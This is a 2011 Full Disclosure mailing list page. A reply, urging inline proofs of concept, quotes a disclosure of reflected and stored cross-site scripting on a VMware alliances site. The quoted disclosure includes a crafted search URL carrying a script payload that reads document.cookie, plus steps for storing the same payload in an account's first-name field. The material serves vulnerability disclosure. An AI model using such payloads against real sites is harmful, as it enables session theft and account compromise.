Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Vmware Web-Site Persistence and Non-Persistence Cross-Site Scripting

From: xD 0x41 <secn3t () gmail com>
Date: Sun, 9 Oct 2011 06:58:07 +1100
nice find.
Please, put your FULL PoC within the email BODY when you are sending out
disclosures..It would make some of us certainly feel abit better about
reading them... specially when gmaqil refuses or has problems scanning, that
should not happen, it should pass straight through... do your own testing,
send from anywhere to gmail/googlemail and watch what the AV scannner says
9and believe me they have a very cool scanner)...


On 8 October 2011 16:42, asish agarwalla <asishagarwalla () gmail com> wrote:


*Non-**Persistence/**Reflected Cross-Site Scripting*


http://alliances.vmware.com/public_html/catalog/searchResult.php?isServicesProduct=no&isEntireCatalogSearch=yes&lastOnMenu=sub1,sub4&searchKey=
"/><script>alert(document.cookie)</script>&category=all&isVmwareReadySelected=no


*Persistence Cross-Site Scripting*

Create a account in VMWARE. Insert First Name as : test
"/>><script>alert(document.cookie)</script>., Inserted script stored as
first name.

Login to vmware, Select Login to as Manage Orders, Inserted script get
executed.






_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: